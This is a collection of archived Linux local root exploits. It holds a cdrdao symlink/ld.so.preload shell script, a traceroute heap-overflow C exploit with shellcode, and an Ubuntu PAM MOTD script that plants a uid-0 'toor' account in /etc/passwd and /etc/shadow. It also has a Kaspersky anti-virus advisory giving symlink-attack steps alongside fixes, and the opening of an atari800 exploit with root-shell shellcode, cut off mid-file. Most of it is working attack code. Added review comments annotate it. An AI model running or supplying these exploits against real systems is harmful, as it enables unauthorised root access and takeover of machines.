Karol Więsek/CDRDAO Local Root Exploit ( linux)
#!/bin/sh
# 2004 proof of concept around cdrdao following the file named by
# $HOME/.cdrdao. Each stage checks the state it depends on and prints
# OK/WRONG; every temporary file is created in the current directory ($DIR).
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Wiêsek <appelast*drumnbass.art.pl>"
echo ""
sleep 2
# umask 000: everything created below is world-readable and world-writable.
umask 000
# Pre-condition: /etc/ld.so.preload must not exist yet.
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
# Pre-condition: /bin/su must carry the setuid bit (test -u).
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
# Build a shared object in $DIR from the heredoc source; the .c and .o
# are removed afterwards, only getuid_lib.so is kept.
echo -n "[*] Creating evil *uid() library ... "
cat > getuid_lib.c << _EOF
int getuid(void) {
return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
# NOTE(review): unlike every other check in this script, this branch does
# not exit, so the script continues without the library.
echo "WRONG"
fi
# Build the small C helper ./suid that the last line of the script runs.
echo -n "[*] Creating suidshell ... "
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
unlink("./suid");
execl("/bin/sh","sh",0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
# NOTE(review): $HOME is unquoted here and in the unlink below; a home
# directory containing whitespace would break both.
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to \$HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2>/dev/null
>/etc/ld.so.preload
echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
# NOTE(review): -s only tests that ./suid is non-empty, which was already
# true right after gcc; it does not confirm that the su step succeeded.
if [ -s ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
# Remove the library and the symlink before running the helper.
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid
# milw0rm.com [2004-09-07]
Michel Kaempf/traceroute Local Root Exploit ( linux)
/*
* MasterSecuritY <www.mastersecurity.fr>
*
* openwall.c - Local root exploit in LBNL traceroute
* Copyright (C) 2000 Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
*
* Updated versions of this exploit and the corresponding advisory will
* be made available at:
*
* ftp://maxx.via.ecp.fr/traceroot/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Flag bits named after the malloc chunk-size flags. Only PREV_INUSE is
 * referenced by main(); IS_MMAPPED is defined but unused. */
#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2
/* Path of the binary main() execve()s; also its argv[0]. */
char * filename = "/usr/sbin/traceroute";
/* Hard-coded addresses for one specific build/platform (going by the
 * names: a stack top and two heap locations). main() derives all of its
 * embedded values from these three numbers. */
unsigned int stack = 0xc0000000 - 4;
unsigned int p = 0x0804ce38;
unsigned int victim = 0x0804c88c;
/* Copied into `gateway' ahead of `shellcode' by main(); the letters are
 * filler and are not patched afterwards. */
char * jmp = "\xeb\x0aXXYYYYZZZZ";
/* x86 Linux payload; the per-instruction comments are the author's.
 * The two XXXX immediates are overwritten by main() with computed
 * addresses (offsets +7 and +12 of the copy inside `gateway'). */
char * shellcode =
/* <shellcode>: xor %edx,%edx */
"\x31\xd2"
/* <shellcode+2>: mov %edx,%eax */
"\x89\xd0"
/* <shellcode+4>: mov $0xb,%al */
"\xb0\x0b"
/* <shellcode+6>: mov $XXXX,%ebx */
"\xbbXXXX"
/* <shellcode+11>: mov $XXXX,%ecx */
"\xb9XXXX"
/* <shellcode+16>: mov %ebx,(%ecx) */
"\x89\x19"
/* <shellcode+18>: mov %edx,0x4(%ecx) */
"\x89\x51\x04"
/* <shellcode+21>: int $0x80 */
"\xcd\x80";
/* Appended after `shellcode' in `gateway' by main(). */
char * program = "/bin/sh";
/*
 * Report whether any of the four bytes of `ui' is 0x00.
 * main() uses this to reject values that a C string could not carry,
 * since an embedded NUL would terminate it early.
 * Returns -1 when at least one byte is zero, 0 otherwise.
 */
int zero( unsigned int ui )
{
	unsigned int shift;
	for ( shift = 0; shift < 32; shift += 8 ) {
		if ( ((ui >> shift) & 0xffu) == 0 ) {
			return( -1 );
		}
	}
	return( 0 );
}
/*
 * Entry point. Fills `host' and `gateway' (both passed to the target as
 * arguments), checks with zero() that every 32-bit value embedded in them
 * is free of NUL bytes, then execve()s `filename'. Returns -1 when a value
 * contains a NUL byte or when execve() returns; otherwise never returns.
 */
int main()
{
char gateway[ 1337 ];
char host[ 1337 ];
/* argv for the target: two -g options followed by the host argument. */
char * argv[] = { filename, "-g", "123", "-g", gateway, host, NULL };
unsigned int next;
int i;
unsigned int hellcode;
unsigned int size;
strcpy( host, "AAAABBBBCCCCDDDDEEEE" );
/* Derived from the file-scope `stack' value minus the lengths of the
 * strings placed above it (presumably an address on the target's stack). */
next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA");
/* Pad `host' with 'X' until `next' is a multiple of 4, then round down.
 * NOTE(review): `i' is int while the bound is unsigned, so the comparison
 * is performed unsigned. */
for ( i = 0; i < next - (next & ~3); i++ ) {
strcat( host, "X" );
}
next = next & ~3;
/* Overwrite 32-bit words 1..4 of `host' in place.
 * NOTE(review): accessing the char array through an unsigned int pointer
 * relies on the platform tolerating unaligned, aliased stores. */
((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE;
((unsigned int *)host)[2] = 0xffffffff;
if ( zero( victim - 12 ) ) {
fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 );
return( -1 );
}
((unsigned int *)host)[3] = victim - 12;
/* Offset from the file-scope `p' past the "123" option and the dotted
 * hex-quad prefix; going by its use, where `gateway' is expected to sit. */
hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" ");
if ( zero( hellcode ) ) {
fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode );
return( -1 );
}
((unsigned int *)host)[4] = hellcode;
size = next - (p - 4);
size = size | PREV_INUSE;
/* Render the four bytes of `size' as a dotted hex quad (19 characters),
 * then append a space, `jmp', `shellcode' and `program'. */
sprintf(
gateway,
"0x%02x.0x%02x.0x%02x.0x%02x",
((unsigned char *)(&size))[0],
((unsigned char *)(&size))[1],
((unsigned char *)(&size))[2],
((unsigned char *)(&size))[3]
);
strcat( gateway, " " );
strcat( gateway, jmp );
strcat( gateway, shellcode );
strcat( gateway, program );
/* Patch the two XXXX immediates of the shellcode copy (offsets +7 and
 * +12 after the prefix and `jmp'); both values must also be NUL-free. */
hellcode += strlen(jmp) + strlen(shellcode);
if ( zero( hellcode ) ) {
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
return( -1 );
}
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode;
hellcode += strlen(program) + 1;
if ( zero( hellcode ) ) {
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
return( -1 );
}
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode;
/* Replace this process with the target; the environment is empty. */
execve( argv[0], argv, NULL );
return( -1 );
}
// milw0rm.com [2000-11-15]
anonymous/Ubuntu PAM MOTD Local Root ( na)
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu PAM MOTD local root
# [*] Backuped /home/user/.ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped /home/user/.cache
# [*] spawn ssh
# [+] owned: /etc/passwd
# [*] spawn ssh
# [+] owned: /etc/shadow
# [*] Restored /home/user/.cache
# [*] Restored /home/user/.ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# root@ubuntu:/home/user# id
# uid=0(root) gid=0(root) groupes=0(root)
#
# P and S are the lines appended to /etc/passwd and /etc/shadow further
# down: a uid-0 account "toor"; per the closing message, the shadow hash
# corresponds to the password "toor". Both entries are deleted again by
# the final su command.
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
# Requirements: an ssh client, ssh-keygen, and an sshd running as root
# (detected by grepping the root process list).
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
# backup FILE: move FILE aside to FILE.bak, first removing a stale FILE.bak.
# Returns 0 when FILE does not exist (nothing to do) or after a successful
# move; returns 1 when the mv fails. Callers rely on this status.
backup() {
[ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
[ -e "$1" ] || return 0
mv "$1"{,.bak} || return 1
echo "[*] Backuped $1"
}
# restore FILE: remove whatever currently sits at FILE and move FILE.bak
# back into place. Returns 0 when there is no FILE.bak (nothing to do) or
# after a successful move; returns 1 when the mv fails.
restore() {
[ -e "$1" ] && rm -rf "$1"
[ -e "$1".bak ] || return 0
mv "$1"{.bak,} || return 1
echo "[*] Restored $1"
}
# key_create: back up ~/.ssh/authorized_keys, generate a passphrase-less
# RSA key at $KEY (assigned by the caller before this runs) and install its
# public half as the only authorized_keys entry. Returns 1 on any failure.
key_create() {
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "[*] SSH key set up"
}
# key_remove: delete the private key at $KEY and put the user's original
# authorized_keys back (via restore).
key_remove() {
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "[*] SSH key removed"
}
# own FILE: replace ~/.cache with a symlink to FILE, perform one ssh login
# to localhost with the temporary key, then test whether FILE has become
# writable. On failure restores ~/.cache and calls bye (defined below;
# bash resolves it at call time, after all functions are loaded).
own() {
[ -e ~/.cache ] && rm -rf ~/.cache
ln -s "$1" ~/.cache || return 1
echo "[*] spawn ssh"
ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
[ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
echo "[+] owned: $1"
}
# bye: clean up the temporary SSH key and exit with status 1.
bye() {
key_remove
exit 1
}
# NOTE(review): mktemp -u only generates a name, it does not create the
# file, so the path is not reserved until ssh-keygen writes it.
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
# Append the entries only when own() reports the file writable.
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
# As toor: delete the temporary entries, reset ownership/group of both
# files, flush nscd's passwd cache and drop into bash.
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
Ubuntu PAM MOTD local root exploit.
Dr. Peter Bieringer/kavLocalRoot.txt ( na)
FYI,
a new version is already available and a proposed workaround is described
at the end of the advisory.
Peter
URLs for this document:
ftp://ftp.aerasec.de/pub/advisories/kav4unix/kav4unix-local-root-exploit.txt
(TXT)
(P) & (C) 2005 AERAsec Network Services and Security GmbH
The information in this advisory may be freely distributed or reproduced,
provided that the advisory is not modified in any way.
Author: Dr. Peter Bieringer
Contact: info at aerasec dot de
Version: 2005-08-12
Title: Insecure directory permissions of default installation of Kaspersky
Anti-Virus for Unix/Linux File Servers will lead to local root exploit
Description:
Because of insecure permissions (777) of the kav log directory, any
unprivileged local user is able to remove the log file and replace it with
a symlink. Because of file names being logged, a symlink pointing to
/etc/passwd can be used to create additional users with root permissions
and empty password.
Additional URLs:
<TO BE FILLED LATER>
Change Log:
2005-06-14: initial version (internal)
2005-07-29: update because of availability of new version (internal)
Vendor notification/information:
2005-04-19: to support@kaspersky.com about insecure permissions in general
in
version 5.0-5 -> no reaction
2005-04-29: to German techsupport about insecure permissions in general in
version 5.0-5 -> got an insufficient answer at 2005-05-11
2005-06-14: to support@kaspersky.com about a possible local-root exploit in
version 5.5-2 -> got response on 2005-06-15
2005-07-26: got new version 5.5-3 from vendor for testing
2005-08-12: minor review before publishing
Tested version:
===============
kav4fileservers-linux-5.5-2.i386.rpm
URL:
ftp://ftp.kaspersky.com/products/release/english/businessoptimal/file_servers/kavlinuxserver/
Probably also affected versions:
kav4fileservers-linux-5.0-5.i386.rpm
kav4mailservers-linux-*
How to reproduce:
=================
1) Install software:
--------------------
# rpm -ihv kav4fileservers-linux-5.5-2.i386.rpm
Preparing... ###########################################
[100%]
1:kav4fileservers-linux ###########################################
[100%]
Kaspersky Anti-Virus for Unix has been installed successfully
but needs to be properly configured before using.
Unfortunately, RPM is not able to run scripts interactively, so
please run /opt/kav/5.5/kav4unix/setup/postinstall.pl
script by yourself to configure it.
2) Configure software:
----------------------
# /opt/kav/5.5/kav4unix/setup/postinstall.pl
Installing license files.
License file (a file with .key extension) is your personal
license key. You need to install it to use the application.
To install it right now, just enter the path to the location of
your license file (enter an empty string to continue without key
file installation):
.
License file ./********.key has been installed
Configuring KeepUp2Date proxy settings.
If you use an http proxy server to access the Internet, you need
to tell the Kaspersky Anti-Virus for Unix KeepUp2Date component
about it. Please enter the address of your http proxy server in
one of the following forms, http://proxyIP:port or
http://user:pass@proxyIP:port. If you don't have or need a proxy
server to access the Internet, enter 'no' here:
Latest anti-virus bases are an essential part of your anti-virus
protection. Do you want to download the latest anti-virus bases
right now to insure your application is up to date? (If you
answer 'yes', make sure you are connected to the Internet):
[yes]:
Running keepup2date to update your anti-virus database.
Kaspersky KeepUp2Date 5.5.2/RELEASE build #98
Copyright (C) Kaspersky Lab, 1997-2005.
Portions Copyright (C) Lan Crypto
Configuration file: /etc/kav/5.5/kav4unix/kav4unix.conf
Getting product configuration
Getting updater configuration
Checking product license keys
Initializing
Trying to update from 'http://ru2h.kaspersky-labs.com'
Copying update description file
Downloading remote file master.xml
Checking update description file integrity
Parsing update description file
Downloading remote file kavset.xml
Copying files
Downloading remote file kavset.xml
Downloading remote file avcmhk4.dll
...
Checking license keys
Downloading remote file ca.avc
...
Checking new bases
Standard AV bases are OK, latest update: 14-06-2005, total records: 126143.
Extended AV bases are OK, latest update: 14-06-2005, total records: 133575.
Redundant AV bases are OK, latest update: 14-06-2005, total records: 134617.
Clearing reserve dir
Replacing files
Saving updater settings
Saving updater settings
Default Webmin configuration file was not found. This means that
either Webmin is not installed at all, or is installed into a
non-default location.
Webmin (www.webmin.com) is a web-based interface for system
administration for various Unix components. If you install it,
you'll be able to configure and use Kaspersky Anti-Virus through
the web interface. If you want to use this functionality, but
haven't installed Webmin yet, you can skip this stage and
install this module later using Webmin's built-in installation
procedure.
If you have Webmin installed in a non-default path, please enter
the path to the location of the Webmin configuration file, or
leave blank to skip?
If you want to use this module later, you can install it using
Webmin's own installation procedure. The module will be placed
in /opt/kav/5.5/kav4unix/contrib/kavfs.wbm.
Would you like to compile the kavmonitor module [Y]:
Enter the linux kernel source path [/lib/modules/2.6.9-5.EL/build]:
checking for gcc... gcc
checking for C compiler default output... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ANSI C... none needed
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking target system type... i686-pc-linux-gnu
LSB_VERSION="1.3"
checking for linux kernel sources... /lib/modules/2.6.9-5.EL/build
checking for linux kernel version... 2.6
checking for vmlinux... "not found"
checking for sys_close is exported... "yes"
checking for do_execve is exported... no, do_execve address=0xc016f3b2
configure: creating ./config.status
config.status: creating Makefile
config.status: creating kavmon.h
config.status: creating osdef.h
config.status: creating module.linux/Makefile
Cleaning module.linux
make[1]: Entering directory `/opt/kav/5.5/kav4unix/src/module.linux'
rm -f **.o *.ko ../bin//kavmon.ko monitor_helpers.c kernel.c queue.c md5.c
cache.c util.c cache.h kavmon.h kernel.h md5.h monitor.h
monitor_helpers.h osdef.h queue.h util.h *.mod.c Makefile.in
make[1]: Leaving directory `/opt/kav/5.5/kav4unix/src/module.linux'
Making link in module.linux
make[1]: Entering directory `/opt/kav/5.5/kav4unix/src/module.linux'
make -C /lib/modules/2.6.9-5.EL/build
SUBDIRS=/opt/kav/5.5/kav4unix/src/module.linux modules
make[2]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686'
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/utils.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/module.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interface.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interface_monitor.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interface_exploit.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interceptor.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/files.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/monitor_helpers.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/kernel.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/queue.o
/opt/kav/5.5/kav4unix/src/module.linux/queue.c: In function
`queue_read_interface':
/opt/kav/5.5/kav4unix/src/module.linux/queue.c:450: warning:
`interruptible_sleep_on' is deprecated (declared at
include/linux/wait.h:290)
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/md5.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/cache.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/util.o
LD [M] /opt/kav/5.5/kav4unix/src/module.linux/kavmon.o
Building modules, stage 2.
MODPOST
CC /opt/kav/5.5/kav4unix/src/module.linux/kavmon.mod.o
LD [M] /opt/kav/5.5/kav4unix/src/module.linux/kavmon.ko
make[2]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686'
make[1]: Leaving directory `/opt/kav/5.5/kav4unix/src/module.linux'
Kaspersky Anti-Virus for Unix is installed.
Configuration file was installed in
/etc/kav/5.5/kav4unix/kav4unix.conf
Binaries were installed in /opt/kav/5.5/kav4unix/bin
3) Start kavmonitor
-------------------
# /etc/rc.d/init.d/kavmonitor start
kavmonitor started
4) Check permissions of log directory
-------------------------------------
# stat /var/log/kav/5.5/kav4unix
File: `/var/log/kav/5.5/kav4unix'
Size: 4096 Blocks: 16 IO Block: 4096 directory
Device: 301h/769d Inode: 229107 Links: 2
Access: (0777/drwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2005-06-14 13:53:37.263023968 +0200
Modify: 2005-06-14 13:53:19.987650224 +0200
Change: 2005-06-14 13:53:19.987650224 +0200
# ll /var/log/kav/5.5/kav4unix
total 32
-rw-r--r-- 1 root root 1933 Jun 14 13:53 kavmonitor.log
-rw-r--r-- 1 root root 18778 Jun 14 13:51 kavupdater.log
-> Note the 0777/drwxrwxrwx of /var/log/kav/5.5/kav4unix
5) Prepare the attack
---------------------
a) Setup an unprivileged local user, e.g. named "test":
b) Switch to user "test":
$ id
uid=1001(test) gid=1001(test) groups=1001(test)
c) Check whether "kavmonitor" is logging well:
$ tail -f /var/log/kav/5.5/kav4unix/kavmonitor.log
[14/06/05 13:54:53 A] pid=7815 uid=1001 /home/test/.bash_profile OPEN
OK
[14/06/05 13:54:53 A] pid=7815 uid=1001 /home/test/.bashrc OPEN OK
[14/06/05 13:55:50 A] pid=7842 uid=1001 /bin/dd EXEC OK
[14/06/05 13:55:50 A] pid=7842 uid=1001 /home/test/urandom-10k.bin CLOSE
OK
[14/06/05 13:56:05 A] pid=7844 uid=1001 /usr/bin/hexdump EXEC OK
[14/06/05 13:56:06 A] pid=7844 uid=1001 /home/test/urandom-10k.bin OPEN
OK
[14/06/05 13:56:12 A] pid=7846 uid=1001 /usr/bin/head EXEC OK
[14/06/05 13:56:24 A] pid=7847 uid=1001 /usr/bin/tail EXEC OK
[14/06/05 13:56:24 A] pid=7847 uid=1001 /lib/tls/libm-2.3.4.so OPEN OK
[14/06/05 13:56:24 A] pid=7847 uid=1001
/var/log/kav/5.5/kav4unix/kavmonitor.log OPEN OK
-> Note that an unprivileged user can read the log file. Nice to see which files other users are accessing in the meantime...
d) Create a special file:
$ echo "Test" > "
hacker::0:0:hacker::
"
-> Note that the line breaks are created by typing CTRL-V CTRL-J
e) Take a look at the result:
$ ll
total 32
-rw-rw-r-- 1 test test 5 Jun 14 14:58 ?hacker::0:0:hacker::?
f) Now access the file to see what kavmonitor will log:
$ cat *
Test
$ tail -f /var/log/kav/5.5/kav4unix/kavmonitor.log
...
[14/06/05 15:30:07 A] pid=27354 uid=1001 /home/test/
hacker::0:0:hacker::
OPEN OK
-> Note that this looks very good now ;-)
6) Start the attack
-------------------
a) Rename the log file; you can do this because of the 0777 permissions of the directory
$ mv /var/log/kav/5.5/kav4unix/kavmonitor.log
/var/log/kav/5.5/kav4unix/kavmonitor.log.orig
b) Create a symlink pointing to /etc/passwd
$ ln -s /etc/passwd /var/log/kav/5.5/kav4unix/kavmonitor.log
c) Wait until next system reboot or manual restart of "kavmonitor"
-> Note that "kavmonitor" doesn't check whether the log file is a symlink or not; by default it opens the file for appending data.
-> Watch the result
$ tail -f /etc/passwd
[14/06/05 15:42:30 I] There are 1 Kaspersky license keys found:
[14/06/05 15:42:30 I] License file ********.key, serial ****-*****-********,
"Kaspersky Anti-Virus Business Optimal for Linux File Server", expires
**-**-2005 in *** days
[14/06/05 15:42:31 A] pid=1984 uid=0 /etc/mtab OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /usr/bin/tail EXEC OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /etc/ld.so.cache OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/libm-2.3.4.so OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/librt-2.3.4.so OPEN
OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/libc-2.3.4.so OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/libpthread-2.3.4.so OPEN
OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /usr/lib/locale/locale-archive OPEN
OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /etc/passwd OPEN OK
[14/06/05 15:42:40 A] pid=1807 uid=0 /etc/group OPEN OK
[14/06/05 15:42:40 A] pid=1807 uid=0 /etc/cups/certs/0 CLOSE OK
-> Voila, one step before success
d) Now access the file to see what kavmonitor will log again:
$ cat *
Test
$ tail -f /etc/passwd
...
[14/06/05 15:45:57 A] pid=27521 uid=1001 /home/test/
hacker::0:0:hacker::
OPEN OK
-> Bingo, login/pam usually skip malformed entries, so the additional log lines don't cause any confusion.
e) Switch to the new created user:
$ su hacker
sh-3.00# id
uid=0(root) gid=0(root) groups=0(root)
-> Take care, what you're doing now, because you have root permissions from
now on ;-)
How to protect against this attack:
===================================
1) Administrator related (in case update is not possible):
----------------------------------------------------------
a) Fix permissions of log directory (default: 0777)
# chmod 750 /var/log/kav/5.5/kav4unix
b) Fix permissions of licenses directory (default: 0777)
# chmod 755 /var/db/kav/5.5/kav4unix/licenses
-> Note that otherwise a malicious user can delete the key, which prevents "keepup2date" from working properly
2) Vendor related:
------------------
* Upgrade to at least version 5.5-3. It introduces system user/group
"kluser"/"klusers" and adjusted permissions to prevent normal users
from running the exploit.
The new installer already mentions this:
<B>Warning:</B> some files/directories have insecure permissions.
This is a big security risk. It leads to known <B>local root exploit</B>
if
any malicious user has access to this computer. We suggest to fix it by
changing the permissions to 775 (or 770). Unfortunately that after the
fix,
you will not be able to run keepup2date from non-root user anymore.
Answer 'Y' if you want fix the permissions now, 'N' if you want to left
them
intact, and '?' to see the list of directories and permissions/owners to
be
changed.
Note that the new installer doesn't take care that "kluser"/"klusers" should be created as a system user/group. At least Red Hat Linux systems support this via "-r". We suggest creating them *before* installing the new version - this prevents a mix-up of uid/gid with normal users:
# groupadd -r klusers
# useradd -r -g klusers -s /sbin/nologin -d /var/db/kav kluser
Then install the package
If a non-root user (e.g. amavis) should be able to use "kavscanner", proper permissions need to be set after adding the user to the group "klusers":
# chgrp klusers /var/db/kav/5.5
# chmod g+ws /var/db/kav/5.5
# touch /var/db/kav/5.5/ichecker.db
# chmod g+w,o-rwx /var/db/kav/5.5/ichecker.db
--
Dr. Peter Bieringer Phone: +49-8102-895190
AERAsec Network Services and Security GmbH Fax: +49-8102-895199
Wagenberger Strasse 1
D-85662 Hohenbrunn E-Mail: pbieringer@aerasec.de
Germany Internet: http://www.aerasec.de
Due to the logs directory being 777 by default, Kaspersky AntiVirus 5.5 is susceptible to a local root exploit via a symlink attack. Details are provided.
pi3/atari800 Local Root Exploit ( linux)
/*
* Exploit for atari800 by pi3 (pi3ki31ny)
*
* pi3@pi3:~$ ./p
*
* ...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...
*
* Ussage:
* [+] ./p [options]
*
* -? <this help screen>
* -v choose a bug:
* 1 - first bug (in all versions Atari800)
* 2 - second bug (in older Atari800 - modiy argv[0])
* 3 - third bug (in config file - OS/A_ROM)
* 4 - fourth bug (in config file - OS/B_ROM)
* 5 - fifth bug (in config file - XL/XE_ROM)
* 6 - sixth bug (in config file - BASIC_ROM)
* -o <offset>
* -p PATH
*
* pi3@pi3:~$
*
* Atari800 have suid bit in default instalation.
* Best regards pi3 (pi3ki31ny).
*
* "Kazdemu trafi sie gowno...!"
*
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* Default location of the target binary; main() accepts -p to override it. */
#define PATH "/usr/local/bin/atari800"
/* Size of the scratch buffer `buf' in main(). */
#define DIRS 256
/* Config file main() reads from the current directory, creating it with
 * default contents when it does not exist. */
#define CONFIG ".atari800.cfg"
/* ...::: -=[ www.pi3.int.pl ]=- :::... */
/* x86 Linux payload placed at the tail of `envp' by main(); the section
 * labels below are the author's. */
char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"
"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"
"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"
"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"
"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"
"\x80"
/* setuid(0) */
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
/* setgid(0) */
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"
/* exec /bin/sh */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80"
/* exit(0) */
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
/*
 * Return the fixed address guess used by every variant in main(); the
 * caller adds the -o offset to it. Both string parameters are kept for
 * interface compatibility only: the original length-based formula was
 * commented out in favour of the constant, so neither is read.
 */
long ret_ad(char *a1, char *a2) {
	(void)a1;
	(void)a2;
	return 0xbfffee01;
}
/*
 * Print the usage banner to stdout and terminate via exit(-1).
 * `arg' is argv[0], substituted into the "[+] %s [options]" line.
 * Never returns; the int return type is never observed by callers.
 */
